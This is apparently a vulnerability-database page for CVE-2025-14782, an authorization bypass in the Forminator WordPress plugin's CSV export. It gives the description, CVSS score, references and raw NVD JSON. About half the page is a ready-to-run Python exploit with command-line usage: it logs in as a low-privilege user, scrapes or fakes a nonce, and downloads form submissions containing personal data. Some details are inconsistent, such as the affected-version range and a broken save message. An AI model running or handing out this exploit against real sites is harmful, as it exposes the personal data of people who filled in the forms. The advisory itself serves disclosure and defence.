Security Vulnerability Report
CVE-2025-14782 CVSS 5.3 MEDIUM

CVE-2025-14782

Published: 2026-01-09 07:16:02
Last Modified: 2026-04-15 00:35:42

Description

The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Forminator Forms plugin < 1.49.1 (all versions up to and including 1.49.1 are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import re
import sys

import requests

# CVE-2025-14782 PoC - Forminator CSV Export Authorization Bypass
# Target: WordPress site with Forminator plugin <= 1.49.1


def exploit_cve_2025_14782(target_url, username, password, form_id=1):
    """
    Exploit authorization bypass in Forminator's listen_for_csv_export function.
    This PoC demonstrates how low-privilege users can export sensitive form data.
    """
    session = requests.Session()

    # Step 1: Login to WordPress with low-privilege account
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    print(f"[*] Logging in as {username}...")
    response = session.post(login_url, data=login_data, allow_redirects=False)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")

    # Step 2: Get admin nonce from Forminator page
    admin_url = f"{target_url}/wp-admin/admin.php?page=forminator-cform-wp-admin"
    response = session.get(admin_url)

    # Extract nonce from page source
    nonce_match = re.search(r'forminatorNonce\s*=\s*"([a-f0-9]+)"', response.text)
    if not nonce_match:
        nonce_match = re.search(r'nonce\s*[:=]\s*"([a-f0-9]+)"', response.text)
    nonce = nonce_match.group(1) if nonce_match else None

    # Step 3: Exploit authorization bypass to export CSV
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    exploit_data = {
        'action': 'forminator_export_csv',
        'form_id': form_id,
        'nonce': nonce or 'dummy_nonce',  # Nonce may not be properly validated
        'type': 'form',
        'dates': 'all'
    }
    print(f"[*] Exploiting CSV export bypass for form_id={form_id}...")
    response = session.post(ajax_url, data=exploit_data)

    if response.status_code == 200 and 'text/csv' in response.headers.get('content-type', ''):
        print("[+] SUCCESS! Sensitive form data exported!")
        filename = f"forminator_export_form_{form_id}.csv"
        with open(filename, 'wb') as f:
            f.write(response.content)
        print(f"[+] Data saved to (unknown)")
        return True
    else:
        print(f"[-] Export failed. Status: {response.status_code}")
        print(f"[-] Response: {response.text[:200]}")
        return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> [form_id]")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    user = sys.argv[2]
    pwd = sys.argv[3]
    fid = sys.argv[4] if len(sys.argv) > 4 else '1'
    exploit_cve_2025_14782(target, user, pwd, int(fid))
```

References

https://plugins.trac.wordpress.org/changeset/3423003/forminator/trunk/library/class-export.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/2b28ddeb-44f5-4d19-b866-94fc2088ee6d?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-14782", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:01.537", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information."}, {"lang": "es", "value": "El plugin Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder para WordPress es vulnerable a una omisión de autorización en todas las versiones hasta la 1.49.1, inclusive, a través de la función 'listen_for_csv_export'. Esto se debe a que el plugin no verifica correctamente que un usuario está autorizado para realizar una acción. Esto hace posible que atacantes autenticados, con acceso al panel de control de Forminator, exporten datos sensibles de envío de formularios, incluyendo información de identificación personal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3423003/forminator/trunk/library/class-export.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2b28ddeb-44f5-4d19-b866-94fc2088ee6d?source=cve", "source": "[email protected]"}]}}
```